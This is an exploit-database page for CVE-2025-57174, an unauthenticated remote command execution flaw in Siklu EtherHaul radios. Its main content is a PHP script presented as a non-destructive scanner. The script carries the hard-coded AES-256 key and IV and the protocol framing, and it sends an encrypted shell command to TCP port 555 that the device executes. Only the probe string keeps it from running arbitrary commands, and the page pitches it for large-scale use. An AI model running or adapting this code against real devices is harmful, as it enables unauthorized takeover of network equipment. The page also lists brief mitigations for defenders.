## https://sploitus.com/exploit?id=PACKETSTORM:214254
=============================================================================================================================================
    | # Title     : Siklu EtherHaul EH-8010 / EH-1200 Vulnerability Scanner                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ceragon.com/products/siklu-by-ceragon                                                                           |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214068/ & CVE-2025-57174
    
    [+] Summary    : This PHP-based scanner safely detects an unauthenticated remote command execution vulnerability in Siklu EtherHaul devices by
                     sending a non-destructive encrypted probe command and validating the response.
                     The scanner does not alter device state and is suitable for large-scale assessments.
    
    [+] Impact:
    
    Successful detection confirms full unauthenticated RCE exposure.
    
    [+] Mitigation:
    
    - Restrict access to TCP port 555
    - Disable the rfpiped service
    - Update the firmware
    
    [+] POC: php poc.php 192.168.1.10
    
    <?php
    
    // TCP port of the service the probe is sent to; the mitigation section of
    // this page refers to the same port.
    define('PORT', 555);
    // Size in bytes of the fixed framing header built by build_header() and read
    // back by RFPipeSession::recv_header(): 0x90 = 144 = nine 16-byte AES blocks.
    define('HDR_LEN', 0x90);
    
    // Initial 16-byte CBC IV as four 32-bit little-endian words. Both the send and
    // the receive direction of a session start from this value (see RFPipeSession).
    $IV0 = pack(
        'V4',
        0xEA703B82,
        0x75A9A17B,
        0x1DFC7BB9,
        0x55A24D72
    );
    
    // 32-byte static AES-256 key (64 hex digits) used for every session.
    // NOTE(review): the key is hard-coded in the client, which suggests it is the
    // same for every device — confirm against the referenced advisory.
    $KEY = hex2bin(
        '89e7ffbeeb2d73f5a910fc425b1f3617' .
        '9fb95e7535a342a05d0248b119d24b82'
    );
    
    /**
     * Reads exactly $len bytes from $sock.
     *
     * Keeps reading until the buffer holds $len bytes; returns false as soon as
     * socket_read() reports an error or an empty chunk (peer closed). Read errors
     * are suppressed with @, so only the return value is inspected. A $len of
     * zero (or less) returns '' without touching the socket.
     *
     * @param resource|\Socket $sock
     * @param int              $len
     * @return string|false
     */
    function recv_exact($sock, $len)
    {
        $buf = '';
        for ($have = 0; $have < $len; $have = strlen($buf)) {
            $piece = @socket_read($sock, $len - $have);
            if ($piece === false || $piece === '') {
                return false;
            }
            $buf .= $piece;
        }
        return $buf;
    }
    
    /**
     * Right-pads $data with NUL bytes to the next multiple of 16 (the AES block
     * size). Input that is already block-aligned, including '', is returned
     * unchanged. This is the only padding applied, since the cipher calls use
     * OPENSSL_ZERO_PADDING.
     *
     * @param string $data
     * @return string
     */
    function pad16_zero($data)
    {
        $missing = (16 - strlen($data) % 16) % 16;
        return $data . str_repeat("\x00", $missing);
    }
    
    /**
     * Byte-wise sum over a HDR_LEN-byte header, skipping offsets 0x0C..0x0F where
     * the checksum itself is stored (see build_header), truncated to 32 bits.
     * Bytes beyond HDR_LEN are ignored.
     *
     * @param string $hdr
     * @return int
     */
    function hdr_checksum($hdr)
    {
        $bytes = array_values(unpack('C*', substr($hdr, 0, HDR_LEN)));
        $total = 0;
        foreach ($bytes as $offset => $byte) {
            // checksum slot is excluded from its own computation
            if ($offset >= 0x0C && $offset < 0x10) {
                continue;
            }
            $total += $byte;
        }
        return $total & 0xFFFFFFFF;
    }
    
    /**
     * Assembles the HDR_LEN-byte, zero-filled framing header:
     *   0x00  flag byte
     *   0x01  message type byte
     *   0x08  payload length, 32-bit little-endian
     *   0x0C  hdr_checksum() over the remaining bytes
     * Every other byte stays zero.
     *
     * @param int $flag
     * @param int $msg
     * @param int $payload_len
     * @return string
     */
    function build_header($flag, $msg, $payload_len)
    {
        $hdr = chr($flag) . chr($msg) . str_repeat("\x00", HDR_LEN - 2);
        $hdr = substr_replace($hdr, pack('V', $payload_len), 0x08, 4);
        // checksum is computed after the length is in place
        $checksum = hdr_checksum($hdr);
        return substr_replace($hdr, pack('V', $checksum), 0x0C, 4);
    }
    
    /**
     * AES-256-CBC session with manually chained IVs.
     *
     * Each direction keeps its own IV; after every message the last 16 bytes of
     * ciphertext become the IV for the next message in that direction. openssl is
     * called with OPENSSL_ZERO_PADDING, so no padding is added or removed here and
     * callers are expected to hand in block-aligned data (see pad16_zero).
     */
    class RFPipeSession
    {
        public $key;
        public $send_iv;
        public $recv_iv;

        // Both directions start from the same IV.
        public function __construct($key, $iv)
        {
            $this->key = $key;
            $this->send_iv = $iv;
            $this->recv_iv = $iv;
        }

        /**
         * Encrypts $data under the current send IV, advances the IV, and writes
         * the ciphertext to $sock. Write errors are suppressed and not reported.
         */
        public function enc_send($sock, $data)
        {
            $ct = $this->cipher($data, $this->send_iv, true);
            $this->send_iv = substr($ct, -16);
            @socket_write($sock, $ct);
        }

        /**
         * Reads and decrypts one HDR_LEN-byte header.
         * Returns false when the socket does not deliver HDR_LEN bytes.
         */
        public function recv_header($sock)
        {
            $pt = $this->read_and_decrypt($sock, HDR_LEN);
            return $pt === null ? false : $pt;
        }

        /**
         * Reads $len payload bytes rounded up to the block size, decrypts them and
         * returns the first $len bytes. Returns false when the read falls short.
         */
        public function dec_recv($sock, $len)
        {
            $wire_len = ($len + 15) & ~15;
            $pt = $this->read_and_decrypt($sock, $wire_len);
            return $pt === null ? false : substr($pt, 0, $len);
        }

        /**
         * Pulls $wire_len ciphertext bytes, decrypts them under the receive IV and
         * advances that IV. Returns null (not false) on a short read so callers can
         * tell a transport failure apart from whatever openssl_decrypt returned.
         */
        private function read_and_decrypt($sock, $wire_len)
        {
            $ct = recv_exact($sock, $wire_len);
            if ($ct === false) {
                return null;
            }
            $pt = $this->cipher($ct, $this->recv_iv, false);
            $this->recv_iv = substr($ct, -16);
            return $pt;
        }

        // Single place for the cipher name and flags shared by both directions.
        private function cipher($data, $iv, $encrypt)
        {
            $flags = OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING;
            return $encrypt
                ? openssl_encrypt($data, 'AES-256-CBC', $this->key, $flags, $iv)
                : openssl_decrypt($data, 'AES-256-CBC', $this->key, $flags, $iv);
        }
    }
    
    // ---- scan driver ---------------------------------------------------------
    // One target per invocation. A single probe command is sent and the verdict
    // rests on whether its output marker comes back; nothing else is sent.
    if ($argc < 2) {
        echo "Usage: php siklu_eh_scanner.php <target>\n";
        exit;
    }
    
    $target = $argv[1];
    // NUL-terminated command line; 'VULN_CHECK' is the marker searched for in
    // the response further down.
    $probe  = "echo VULN_CHECK\x00";
    
    // Errors are suppressed: if socket_create() fails, $sock is false and the
    // connect call below receives a non-socket value instead of a clean error.
    $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if (!@socket_connect($sock, $target, PORT)) {
        echo "[!] Connection failed\n";
        exit;
    }
    
    // Fresh session from the static key/IV. The header announces flag 0x00,
    // message type 0x01 and the *unpadded* probe length; the zero-padded probe
    // follows as a second encrypted message.
    $sess = new RFPipeSession($KEY, $IV0);
    $hdr  = build_header(0x00, 0x01, strlen($probe));
    
    $sess->enc_send($sock, $hdr);
    $sess->enc_send($sock, pad16_zero($probe));
    
    // A short read (peer closed or never answered) ends the check; the script
    // cannot distinguish a filtered port from a patched device here.
    $resp_hdr = $sess->recv_header($sock);
    if ($resp_hdr === false) {
        echo "[?] No response (filtered or patched)\n";
        exit;
    }
    
    // Payload length from offset 0x08 of the decrypted header (unsigned 32-bit,
    // so the <= 0 branch only fires on 0).
    // NOTE(review): the response header is neither checksum-verified
    // (hdr_checksum() is only used on the send side) nor is $len bounded before
    // dec_recv() tries to read that many bytes, so a peer returning a huge length
    // keeps this client blocked inside recv_exact(). The early exits above also
    // skip socket_close(); the descriptor is released only at process exit.
    $len = unpack('V', substr($resp_hdr, 0x08, 4))[1];
    if ($len <= 0) {
        echo "[-] Not Vulnerable\n";
        exit;
    }
    
    // Verdict: the marker appearing in the returned output means the probe
    // command was executed by the device.
    $data = $sess->dec_recv($sock, $len);
    if ($data !== false && strpos($data, 'VULN_CHECK') !== false) {
        echo "[+] VULNERABLE: Unauthenticated RCE detected\n";
    } else {
        echo "[-] Not Vulnerable\n";
    }
    
    socket_close($sock);
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================